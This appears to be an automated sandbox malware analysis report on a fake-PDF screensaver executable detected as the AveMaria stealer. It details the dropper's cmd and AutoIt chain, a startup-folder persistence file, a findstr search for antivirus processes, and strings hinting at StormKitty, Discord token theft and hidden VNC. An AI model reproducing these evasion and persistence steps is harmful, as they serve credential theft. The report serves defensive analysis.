Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\EchoArtisan Technologies\EchoCraft.js", CommandLine: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\EchoArtisan Technologies\EchoCraft.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1044, ProcessCommandLine: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\EchoArtisan Technologies\EchoCraft.js", ProcessId: 7808, ProcessName: wscript.exe

Sigma detected: Execution of Suspicious File Type Extension

Source: Process started

Author: Max Altgelt (Nextron Systems): Data: Command: Tracks.pif L, CommandLine: Tracks.pif L, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\186040\Tracks.pif, NewProcessName: C:\Users\user\AppData\Local\Temp\186040\Tracks.pif, OriginalFileName: C:\Users\user\AppData\Local\Temp\186040\Tracks.pif, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c copy Swing Swing.cmd & Swing.cmd, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7480, ParentProcessName: cmd.exe, ProcessCommandLine: Tracks.pif L, ProcessId: 7684, ProcessName: Tracks.pif

Sigma detected: SCR File Write Event

Source: File created

Author: Christopher Peacock @securepeacock, SCYTHE @scythe_io: Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\186040\Tracks.pif, ProcessId: 7684, TargetFilename: C:\Users\user\AppData\Local\EchoArtisan Technologies\EchoCraft.scr

Sigma detected: Suspicious Copy From or To System Directory

Source: Process started

Author: Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /c copy Swing Swing.cmd & Swing.cmd, CommandLine: "C:\Windows\System32\cmd.exe" /c copy Swing Swing.cmd & Swing.cmd, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\nj230708full.pdf.scr.exe", ParentImage: C:\Users\user\Desktop\nj230708full.pdf.scr.exe, ParentProcessId: 7424, ParentProcessName: nj230708full.pdf.scr.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c copy Swing Swing.cmd & Swing.cmd, ProcessId: 7480, ProcessName: cmd.exe

Sigma detected: Suspicious Schtasks From Env Var Folder

Source: Process started

Sigma detected: Suspicious Screensaver Binary File Creation

Source: File created

Author: frack113: Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\186040\Tracks.pif, ProcessId: 7684, TargetFilename: C:\Users\user\AppData\Local\EchoArtisan Technologies\EchoCraft.scr

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Source: Process started

Author: Michael Haag: Data: Command: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\EchoArtisan Technologies\EchoCraft.js", CommandLine: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\EchoArtisan Technologies\EchoCraft.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1044, ProcessCommandLine: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\EchoArtisan Technologies\EchoCraft.js", ProcessId: 7808, ProcessName: wscript.exe

Data Obfuscation

Sigma detected: Drops script at startup location

Source: File created

Author: Joe Security: Data: EventID: 11, Image: C:\Windows\SysWOW64\cmd.exe, ProcessId: 7800, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EchoCraft.url

HIPS / PFW / Operating System Protection Evasion

Sigma detected: Search for Antivirus process

Source: Process started

Author: Joe Security: Data: Command: findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth" , CommandLine: findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth" , CommandLine|base64offset|contains: ~), Image: C:\Windows\SysWOW64\findstr.exe, NewProcessName: C:\Windows\SysWOW64\findstr.exe, OriginalFileName: C:\Windows\SysWOW64\findstr.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c copy Swing Swing.cmd & Swing.cmd, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7480, ParentProcessName: cmd.exe, ProcessCommandLine: findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth" , ProcessId: 7592, ProcessName: findstr.exe

Suricata Signatures

⊘No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Yara detected AveMaria stealer

Source: Yara match

File source: Process Memory Space: MSBuild.exe PID: 5812, type: MEMORYSTR

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 95.8% probability

Source: nj230708full.pdf.scr.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.4:49736 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.4:49876 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.4:49990 version: TLS 1.2

Source: nj230708full.pdf.scr.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: f:\binaries\Intermediate\ndp_msbuild\xmakecommandline.csproj_1613737345\objr\x86\MSBuild.pdb source: MSBuild.exe, 00000018.00000002.2137514011.0000000003E59000.00000004.00000800.00020000.00000000.sdmp, winservices.exe, 0000001F.00000000.2151769138.00000000009B2000.00000002.00000001.01000000.0000000C.sdmp, MSBuild.exe, 00000024.00000002.2801398019.0000000003872000.00000004.00000800.00020000.00000000.sdmp, winservices.exe.24.dr
Source:	Binary string: D:\Work\NNProject\HVNCDll\obj\Release\hvnc.pdb source: MSBuild.exe, 00000018.00000002.2132702456.0000000000D02000.00000040.00000400.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\nj230708full.pdf.scr.exe	Code function: 0_2_004062D5 FindFirstFileW,FindClose,	0_2_004062D5
Source: C:\Users\user\Desktop\nj230708full.pdf.scr.exe	Code function: 0_2_00402E18 FindFirstFileW,	0_2_00402E18
Source: C:\Users\user\Desktop\nj230708full.pdf.scr.exe	Code function: 0_2_00406C9B DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,	0_2_00406C9B
Source: C:\Users\user\AppData\Local\EchoArtisan Technologies\EchoCraft.scr	Code function: 18_2_00AFA32C FindFirstFileW,Sleep,FindNextFileW,FindClose,	18_2_00AFA32C
Source: C:\Users\user\AppData\Local\EchoArtisan Technologies\EchoCraft.scr	Code function: 18_2_00AEE334 GetFileAttributesW,FindFirstFileW,FindClose,	18_2_00AEE334
Source: C:\Users\user\AppData\Local\EchoArtisan Technologies\EchoCraft.scr	Code function: 18_2_00AF65AE FindFirstFileW,FindNextFileW,FindClose,	18_2_00AF65AE
Source: C:\Users\user\AppData\Local\EchoArtisan Technologies\EchoCraft.scr	Code function: 18_2_00ABC6C2 FindFirstFileExW,	18_2_00ABC6C2
Source: C:\Users\user\AppData\Local\EchoArtisan Technologies\EchoCraft.scr	Code function: 18_2_00AF72A6 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,	18_2_00AF72A6
Source: C:\Users\user\AppData\Local\EchoArtisan Technologies\EchoCraft.scr	Code function: 18_2_00AF7205 FindFirstFileW,FindClose,	18_2_00AF7205
Source: C:\Users\user\AppData\Local\EchoArtisan Technologies\EchoCraft.scr	Code function: 18_2_00AED7CC FindFirstFileW,DeleteFileW,CompareStringW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	18_2_00AED7CC
Source: C:\Users\user\AppData\Local\EchoArtisan Technologies\EchoCraft.scr	Code function: 18_2_00AEDB0B FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	18_2_00AEDB0B
Source: C:\Users\user\AppData\Local\EchoArtisan Technologies\EchoCraft.scr	Code function: 18_2_00AF9E43 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	18_2_00AF9E43
Source: C:\Users\user\AppData\Local\EchoArtisan Technologies\EchoCraft.scr	Code function: 18_2_00AF9F9E SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	18_2_00AF9F9E

Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\186040	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\186040\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\	Jump to behavior

Networking

Yara detected Generic Downloader

Source: Yara match

File source: 24.2.MSBuild.exe.de9f06.0.raw.unpack, type: UNPACKEDPE

Source: Joe Sandbox View

JA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4

Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknown	TCP traffic detected without corresponding DNS query: 199.232.214.172
Source: unknown	TCP traffic detected without corresponding DNS query: 199.232.214.172
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Users\user\AppData\Local\EchoArtisan Technologies\EchoCraft.scr

Code function: 18_2_00AFD672 InternetReadFile,SetEvent,GetLastError,SetEvent,

18_2_00AFD672

Source: global traffic

DNS traffic detected: DNS query: ldGbGMtXrGEEgvmsQPPgfGUzt.ldGbGMtXrGEEgvmsQPPgfGUzt

Source: nj230708full.pdf.scr.exe	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: nj230708full.pdf.scr.exe	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: nj230708full.pdf.scr.exe	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: nj230708full.pdf.scr.exe	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: nj230708full.pdf.scr.exe, 00000000.00000003.1694831618.00000000028D1000.00000004.00000020.00020000.00000000.sdmp, Tracks.pif, 0000000A.00000003.1748119592.0000000003F93000.00000004.00000800.00020000.00000000.sdmp, Tracks.pif.1.dr, Skirts.0.dr, EchoCraft.scr.10.dr	String found in binary or memory: http://crl.globalsign.com/gs/gstimestampingsha2g2.crl0
Source: nj230708full.pdf.scr.exe, 00000000.00000003.1694831618.00000000028D1000.00000004.00000020.00020000.00000000.sdmp, Tracks.pif, 0000000A.00000003.1748119592.0000000003F93000.00000004.00000800.00020000.00000000.sdmp, Tracks.pif.1.dr, Skirts.0.dr, EchoCraft.scr.10.dr	String found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
Source: nj230708full.pdf.scr.exe, 00000000.00000003.1694831618.00000000028D1000.00000004.00000020.00020000.00000000.sdmp, Tracks.pif, 0000000A.00000003.1748119592.0000000003F93000.00000004.00000800.00020000.00000000.sdmp, Tracks.pif.1.dr, Skirts.0.dr, EchoCraft.scr.10.dr	String found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
Source: nj230708full.pdf.scr.exe, 00000000.00000003.1694831618.00000000028D1000.00000004.00000020.00020000.00000000.sdmp, Tracks.pif, 0000000A.00000003.1748119592.0000000003F93000.00000004.00000800.00020000.00000000.sdmp, Tracks.pif.1.dr, Skirts.0.dr, EchoCraft.scr.10.dr	String found in binary or memory: http://crl.globalsign.net/root-r3.crl0
Source: nj230708full.pdf.scr.exe	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: nj230708full.pdf.scr.exe	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: nj230708full.pdf.scr.exe	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: nj230708full.pdf.scr.exe	String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: nj230708full.pdf.scr.exe	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: nj230708full.pdf.scr.exe	String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
Source: nj230708full.pdf.scr.exe	String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: MSBuild.exe, 00000018.00000002.2132702456.0000000000D02000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://ipinfo.io/ip
Source: MSBuild.exe, 00000018.00000002.2132702456.0000000000D02000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://james.newtonking.com/projects/json
Source: nj230708full.pdf.scr.exe	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: nj230708full.pdf.scr.exe	String found in binary or memory: http://ocsp.digicert.com0
Source: nj230708full.pdf.scr.exe	String found in binary or memory: http://ocsp.digicert.com0A
Source: nj230708full.pdf.scr.exe	String found in binary or memory: http://ocsp.digicert.com0C
Source: nj230708full.pdf.scr.exe	String found in binary or memory: http://ocsp.digicert.com0O
Source: nj230708full.pdf.scr.exe, 00000000.00000003.1694831618.00000000028D1000.00000004.00000020.00020000.00000000.sdmp, Tracks.pif, 0000000A.00000003.1748119592.0000000003F93000.00000004.00000800.00020000.00000000.sdmp, Tracks.pif.1.dr, Skirts.0.dr, EchoCraft.scr.10.dr	String found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
Source: nj230708full.pdf.scr.exe, 00000000.00000003.1694831618.00000000028D1000.00000004.00000020.00020000.00000000.sdmp, Tracks.pif, 0000000A.00000003.1748119592.0000000003F93000.00000004.00000800.00020000.00000000.sdmp, Tracks.pif.1.dr, Skirts.0.dr, EchoCraft.scr.10.dr	String found in binary or memory: http://ocsp2.globalsign.com/gstimestampingsha2g20
Source: nj230708full.pdf.scr.exe, 00000000.00000003.1694831618.00000000028D1000.00000004.00000020.00020000.00000000.sdmp, Tracks.pif, 0000000A.00000003.1748119592.0000000003F93000.00000004.00000800.00020000.00000000.sdmp, Tracks.pif.1.dr, Skirts.0.dr, EchoCraft.scr.10.dr	String found in binary or memory: http://ocsp2.globalsign.com/rootr306
Source: MSBuild.exe, 00000018.00000002.2134406759.00000000030C4000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000024.00000002.2795960802.0000000002AED000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: nj230708full.pdf.scr.exe, 00000000.00000003.1694831618.00000000028D1000.00000004.00000020.00020000.00000000.sdmp, Tracks.pif, 0000000A.00000003.1748119592.0000000003F93000.00000004.00000800.00020000.00000000.sdmp, Tracks.pif.1.dr, Skirts.0.dr, EchoCraft.scr.10.dr	String found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
Source: nj230708full.pdf.scr.exe, 00000000.00000003.1694831618.00000000028D1000.00000004.00000020.00020000.00000000.sdmp, Tracks.pif, 0000000A.00000003.1748119592.0000000003F93000.00000004.00000800.00020000.00000000.sdmp, Tracks.pif.1.dr, Skirts.0.dr, EchoCraft.scr.10.dr	String found in binary or memory: http://secure.globalsign.com/cacert/gstimestampingsha2g2.crt0
Source: nj230708full.pdf.scr.exe, 00000000.00000003.1694831618.00000000028D1000.00000004.00000020.00020000.00000000.sdmp, Tracks.pif, 0000000A.00000003.1748119592.0000000003F93000.00000004.00000800.00020000.00000000.sdmp, Tracks.pif, 0000000A.00000000.1735557407.0000000000225000.00000002.00000001.01000000.00000006.sdmp, EchoCraft.scr, 00000012.00000002.1801392801.0000000000B55000.00000002.00000001.01000000.00000008.sdmp, EchoCraft.scr, 00000015.00000002.1909972236.0000000000B55000.00000002.00000001.01000000.00000008.sdmp, Tracks.pif.1.dr, Skirts.0.dr, EchoCraft.scr.10.dr	String found in binary or memory: http://www.autoitscript.com/autoit3/X
Source: nj230708full.pdf.scr.exe	String found in binary or memory: http://www.digicert.com/CPS0
Source: MSBuild.exe, 00000018.00000002.2132702456.0000000000D02000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://www.newtonsoft.com/jsonschema
Source: MSBuild.exe, 00000018.00000002.2132702456.0000000000D02000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://discordapp.com/api/v6/users/
Source: MSBuild.exe, 00000018.00000002.2132702456.0000000000D02000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://github.com/LimerBoy/StormKitty
Source: MSBuild.exe, 00000018.00000002.2132702456.0000000000D02000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/11564914/23354;
Source: MSBuild.exe, 00000018.00000002.2132702456.0000000000D02000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/14436606/23354cIt
Source: MSBuild.exe, 00000018.00000002.2132702456.0000000000D02000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/2152978/23354
Source: MSBuild.exe, 00000018.00000002.2132702456.0000000000D02000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://urn.to/r/sds_see
Source: MSBuild.exe, 00000018.00000002.2132702456.0000000000D02000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://urn.to/r/sds_seeaCould
Source: nj230708full.pdf.scr.exe, 00000000.00000003.1694831618.00000000028D1000.00000004.00000020.00020000.00000000.sdmp, Tracks.pif, 0000000A.00000003.1748119592.0000000003F93000.00000004.00000800.00020000.00000000.sdmp, Tracks.pif.1.dr, Skirts.0.dr, EchoCraft.scr.10.dr	String found in binary or memory: https://www.autoitscript.com/autoit3/
Source: nj230708full.pdf.scr.exe	String found in binary or memory: https://www.digicert.com/CPS0
Source: EchoCraft.scr.10.dr	String found in binary or memory: https://www.globalsign.com/repository/0
Source: nj230708full.pdf.scr.exe, 00000000.00000003.1694831618.00000000028D1000.00000004.00000020.00020000.00000000.sdmp, Tracks.pif, 0000000A.00000003.1748119592.0000000003F93000.00000004.00000800.00020000.00000000.sdmp, Tracks.pif.1.dr, Skirts.0.dr, EchoCraft.scr.10.dr	String found in binary or memory: https://www.globalsign.com/repository/06

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49865
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49986
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 49817 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49864
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49985
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49863
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49984
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49862
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49983
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49861
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49982
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49860
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49981
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49980
Source: unknown	Network traffic detected: HTTP traffic on port 49932 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49898 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49875 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49852 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49795 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49990 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49859
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49858
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49979
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49857
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49978
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49856
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49977
Source: unknown	Network traffic detected: HTTP traffic on port 49772 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49855
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49976
Source: unknown	Network traffic detected: HTTP traffic on port 49841 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49854
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49975
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49853
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49974
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49852
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49973
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49851
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49972
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49850
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49971
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49970
Source: unknown	Network traffic detected: HTTP traffic on port 49967 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49784 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49909 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49806 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49943 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49849
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49848
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49969
Source: unknown	Network traffic detected: HTTP traffic on port 49978 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49847
Source: unknown	Network traffic detected: HTTP traffic on port 49886 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49968
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49846
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49967
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49845
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49966
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49844
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49965
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49843
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49964
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49842
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49963
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49841
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49962
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49840
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49961
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49960
Source: unknown	Network traffic detected: HTTP traffic on port 49966 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49989 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49760 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49828 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49933 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49805 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49839
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49838
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49959
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49837
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49958
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49836
Source: unknown	Network traffic detected: HTTP traffic on port 49921 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49957
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49835
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49956
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49834
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49955
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49833
Source: unknown	Network traffic detected: HTTP traffic on port 49887 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49954
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49832
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49953
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49831
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49952
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49830
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49951
Source: unknown	Network traffic detected: HTTP traffic on port 49839 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49864 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49950
Source: unknown	Network traffic detected: HTTP traffic on port 49944 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49910 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49853 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49796 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49955 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49829
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49828
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49949
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49827
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49948
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49826
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49947
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49825
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49946
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49824
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49945
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49823
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49944
Source: unknown	Network traffic detected: HTTP traffic on port 49771 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49822
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49943
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49788
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49787
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49786
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49785
Source: unknown	Network traffic detected: HTTP traffic on port 49922 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49784
Source: unknown	Network traffic detected: HTTP traffic on port 49945 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49783
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49782
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49781
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49780
Source: unknown	Network traffic detected: HTTP traffic on port 49968 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49785 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49807 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49980 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49759 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49779
Source: unknown	Network traffic detected: HTTP traffic on port 49885 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49778
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49899
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49777
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49898
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49776
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49897
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49775
